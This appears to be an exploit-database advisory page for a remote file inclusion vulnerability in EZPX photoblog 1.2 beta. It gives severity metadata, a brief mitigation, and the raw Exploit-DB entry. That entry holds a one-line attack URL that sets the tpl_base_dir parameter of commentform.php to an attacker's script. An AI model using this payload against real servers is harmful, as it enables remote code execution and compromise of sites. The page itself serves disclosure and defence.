header-logo
Suggest Exploit
vendor:
photoblog
by:
sh00t0ut
7,5
CVSS
HIGH
Remote Include
98
CWE
Product Name: photoblog
Affected Version From: 1.2 beta
Affected Version To: 1.2 beta
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
N/A

EZPX photoblog 1.2 beta Remote Include Exploit

This exploit allows an attacker to include a malicious script on the vulnerable server by manipulating the tpl_base_dir parameter in the commentform.php file.

Mitigation:

The tpl_base_dir parameter should be validated to ensure that it is not pointing to a malicious script.
Source

Exploit-DB raw data:

[~] EZPX photoblog 1.2 beta Remote Include Exploit
[~] Vendor Url: http://ezpx.org/
[~] Found by sh00t0ut
[~] Expl: http://[victim]/system/application/views/public/commentform.php?tpl_base_dir=[evil script]

Navigation

Suggest Exploit

Services By CQR